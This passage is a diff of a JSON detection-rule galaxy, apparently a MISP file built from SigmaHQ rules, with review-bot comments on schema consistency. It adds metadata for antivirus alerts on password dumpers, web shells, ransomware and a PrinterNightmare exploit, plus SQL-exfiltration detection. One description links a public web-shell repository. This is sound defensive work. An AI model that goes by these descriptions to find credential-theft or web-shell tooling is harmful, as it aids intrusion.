+ ],
 "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d",
 "value": "Conti Volume Shadow Listing"
 },
- {
- "description": "Detects suspicious powershell invocations from interpreters or unusual programs",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "Microsoft Operations Manager (MOM)",
- "Other scripts"
- ],
- "filename": "proc_creation_win_susp_powershell_parent_combo.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ]
- },
- "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db",
- "value": "Suspicious PowerShell Invocation Based on Parent Process"
- },
 {
 "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.",
 "meta": {
@@ -53588,8 +69041,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml"
 ],
 "tags": [
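Review bot: The element `Suspicious PowerShell Invocation Based on Parent Process` (uuid `95eadcb2-92e4-4ed1-9031-92547773a6db`) is deleted outright, so any event already tagged with that cluster uuid now references an element that no longer exists in the galaxy, and the diff does not show whether the upstream rule `proc_creation_win_susp_powershell_parent_combo.yml` was removed or only renamed. Before merging, it would be worth checking upstream and, if the galaxy's convention is to keep removed rules, retaining the element rather than dropping it.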
@@ -53597,6 +69050,15 @@
 "attack.t1053.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc",
 "value": "Interactive AT Job"
 },
@@ -53645,9 +69107,390 @@
 "attack.t1053.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad",
 "value": "Suspicious Add Scheduled Command Pattern"
 },
+ {
+ "description": "Detects a highly relevant Antivirus alert that reports a password dumper",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2018/09/09",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "av_password_dumper.yml",
+ "level": "critical",
+ "logsource.category": "antivirus",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection",
+ "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003",
+ "attack.t1558",
+ "attack.t1003.001",
+ "attack.t1003.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93",
+ "value": "Antivirus Password Dumper Detection"
+ },
+ {
+ "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .",
+ "meta": {
+ "author": "Sittikorn S, Nuttakorn T, Tim Shelton",
+ "creation_date": "2021/07/01",
+ "falsepositive": [
+ "Unlikely, or pending PSP analysis"
+ ],
+ "filename": "av_printernightmare_cve_2021_34527.yml",
+ "level": "critical",
+ "logsource.category": "antivirus",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
+ "https://twitter.com/mvelazco/status/1410291741241102338",
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1055"
+ ]
+ },
+ "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561",
+ "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection"
+ },
+ {
+ "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name",
+ "meta": {
+ "author": "Florian Roth, Arnim Rupp",
+ "creation_date": "2018/09/09",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "av_relevant_files.yml",
+ "level": "high",
+ "logsource.category": "antivirus",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_relevant_files.yml"
+ ],
+ "tags": [
+ "attack.resource_development",
+ "attack.t1588"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "ce0687a0-e692-4b77-964a-0784a8e54ff1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c",
+ "value": "Antivirus Relevant File Paths Alerts"
+ },
+ {
+ "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2018/09/09",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "av_exploiting.yml",
+ "level": "critical",
+ "logsource.category": "antivirus",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1203",
+ "attack.command_and_control",
+ "attack.t1219"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864",
+ "value": "Antivirus Exploitation Framework Detection"
+ },
+ {
+ "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/08/16",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "av_hacktool.yml",
+ "level": "high",
+ "logsource.category": "antivirus",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1204"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba",
+ "value": "Antivirus Hacktool Detection"
+ },
+ {
+ "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.",
+ "meta": {
+ "author": "Florian Roth, Arnim Rupp",
+ "creation_date": "2018/09/09",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "av_webshell.yml",
+ "level": "high",
+ "logsource.category": "antivirus",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection",
+ "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection",
+ "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection",
+ "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection",
+ "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/",
+ "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection",
+ "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection",
+ "https://github.com/tennc/webshell",
+ "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1505.003"
+ ]
+ },
+ "uuid": "fdf135a2-9241-4f96-a114-bb404948f736",
+ "value": "Antivirus Web Shell Detection"
+ },
+ {
+ "description": "Detects a highly relevant Antivirus alert that reports ransomware",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/05/12",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "av_ransomware.yml",
+ "level": "critical",
+ "logsource.category": "antivirus",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://www.nextron-systems.com/?s=antivirus",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_ransomware.yml"
+ ],
+ "tags": [
+ "attack.t1486"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f",
+ "value": "Antivirus Ransomware Detection"
+ },
+ {
+ "description": "Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields",
+ "meta": {
+ "author": "@juju4",
+ "creation_date": "2022/12/27",
+ "falsepositive": [
+ "Inventory and monitoring activity",
+ "Vulnerability scanners",
+ "Legitimate applications"
+ ],
+ "filename": "db_anomalous_query.yml",
+ "level": "medium",
+ "logsource.category": "database",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://github.com/sqlmapproject/sqlmap",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/category/database/db_anomalous_query.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.initial_access",
+ "attack.privilege_escalation",
+ "attack.t1190",
+ "attack.t1505.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "f9e9365a-9ca2-4d9c-8e7c-050d73d1101a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5",
+ "value": "Suspicious SQL Query"
+ },
+ {
+ "description": "Detects an issue in apache logs that reports threading related errors",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2019/01/22",
+ "falsepositive": [
+ "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185"
+ ],
+ "filename": "web_apache_threading_error.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "No established product",
+ "refs": [
+ "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/product/apache/web_apache_threading_error.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c",
+ "value": "Apache Threading Error"
+ },
+ {
+ "description": "Detects a segmentation fault error message caused by a creashing apache worker process",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2017/02/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "web_apache_segfault.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "No established product",
+ "refs": [
+ "http://www.securityfocus.com/infocus/1633",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/product/apache/web_apache_segfault.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1499.004"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1",
+ "value": "Apache Segmentation Fault"
+ },
+ {
+ "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2017/02/28",
+ "falsepositive": [
+ "Vulnerability scanners",
+ "Frequent attacks if system faces Internet"
+ ],
+ "filename": "modsec_mulitple_blocks.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "modsecurity",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/product/modsecurity/modsec_mulitple_blocks.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1499"
+ ]
+ },
+ "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23",
+ "value": "Multiple Modsecurity Blocks"
+ },
 {
 "description": "Detects when an security threat is detected in Okta.",
 "meta": {
@@ -53662,8 +69505,8 @@
 "logsource.product": "okta",
 "refs": [
 "https://developer.okta.com/docs/reference/api/system-log/",
- "https://developer.okta.com/docs/reference/api/event-types/",
 "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm",
+ "https://developer.okta.com/docs/reference/api/event-types/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml"
 ],
 "tags": "No established tags"
@@ -53950,8 +69793,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml"
 ],
 "tags": [
@@ -53959,6 +69802,15 @@
 "attack.t1573"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95",
 "value": "Activity from Anonymous IP Addresses"
 },
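Review bot: The new `Apache Threading Error` element sets `"tags": "No established tags"` while every other element's `tags` is an array, so a consumer iterating `meta.tags` breaks on this one; the same sentinel pattern appears as `"logsource.category": "No established category"` and `"logsource.product": "No established product"` across the antivirus, database and apache elements in this hunk. An empty array (`"tags": []`) and omitting the `logsource.*` keys when the upstream rule has none would keep one type per key. Separately, `Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection` (`attack.t1055`) and `Antivirus Web Shell Detection` (`attack.t1505.003`) get no `related` array although the neighbouring elements with technique tags do, which may mean the tag-to-ATT&CK lookup misses those two techniques — worth confirming in the generator. Descriptions are copied verbatim from upstream (`keywrods`, `creashing`), so those typos belong in SigmaHQ rather than here.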
@@ -53975,8 +69827,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml"
 ],
 "tags": [
@@ -53984,6 +69836,15 @@
 "attack.t1537"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda",
 "value": "Data Exfiltration to Unsanctioned Apps"
 },
@@ -54000,8 +69861,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml"
 ],
 "tags": [
@@ -54009,6 +69870,15 @@
 "attack.t1573"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498",
 "value": "Activity from Suspicious IP Addresses"
 },
@@ -54025,8 +69895,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml"
 ],
 "tags": [
@@ -54034,6 +69904,15 @@
 "attack.t1020"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8",
 "value": "Suspicious Inbox Forwarding"
 },
@@ -54050,8 +69929,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml"
 ],
 "tags": [
@@ -54075,10 +69954,10 @@
 "logsource.product": "m365",
 "refs": [
 "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
- "https://www.sygnia.co/golden-saml-advisory",
- "https://o365blog.com/post/aadbackdoor/",
 "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
+ "https://o365blog.com/post/aadbackdoor/",
 "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf",
+ "https://www.sygnia.co/golden-saml-advisory",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml"
 ],
 "tags": [
@@ -54086,6 +69965,15 @@
 "attack.t1136.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339",
 "value": "New Federated Domain Added"
 },
@@ -54102,8 +69990,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml"
 ],
 "tags": [
@@ -54135,6 +70023,15 @@
 "attack.t1114"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "6897cd82-6664-11ed-9022-0242ac120002",
 "value": "PST Export Alert Using New-ComplianceSearchAction"
 },
@@ -54151,8 +70048,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml"
 ],
 "tags": [
@@ -54160,6 +70057,15 @@
 "attack.t1485"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd",
 "value": "Microsoft 365 - Unusual Volume of File Deletion"
 },
@@ -54176,8 +70082,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml"
 ],
 "tags": [
@@ -54185,6 +70091,15 @@
 "attack.t1199"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ff246f56-7f24-402a-baca-b86540e3925c",
 "value": "Microsoft 365 - User Restricted from Sending Email"
 },
@@ -54201,8 +70116,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml"
 ],
 "tags": [
@@ -54225,8 +70140,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml"
 ],
 "tags": [
@@ -54250,8 +70165,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml"
 ],
 "tags": [
@@ -54259,6 +70174,15 @@
 "attack.t1486"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69",
 "value": "Microsoft 365 - Potential Ransomware Activity"
 },
@@ -54283,6 +70207,15 @@
 "attack.t1114"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0",
 "value": "PST Export Alert Using eDiscovery Alert"
 },
@@ -54299,8 +70232,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
+ "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml"
 ],
 "tags": [
@@ -54308,6 +70241,15 @@
 "attack.t1573"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "0f2468a2-5055-4212-a368-7321198ee706",
 "value": "Activity from Infrequent Country"
 },
@@ -54421,11 +70363,11 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
+ "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control",
 "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole",
+ "https://github.com/elastic/detection-rules/pull/1267",
 "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
 "https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
- "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control",
- "https://github.com/elastic/detection-rules/pull/1267",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml"
 ],
 "tags": [
@@ -54473,8 +70415,8 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
- "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
 "https://cloud.google.com/kubernetes-engine/docs",
+ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
 "https://kubernetes.io/docs/concepts/workloads/controllers/job/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml"
 ],
@@ -54526,8 +70468,8 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
- "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html",
 "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml"
 ],
 "tags": [
@@ -54535,6 +70477,15 @@
 "attack.t1562"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b",
 "value": "Google Cloud Firewall Modified or Deleted"
 },
@@ -54559,6 +70510,15 @@
 "attack.t1565"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7",
 "value": "Google Cloud Re-identifies Sensitive Information"
 },
@@ -54587,6 +70547,22 @@
 "attack.t1552.007"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
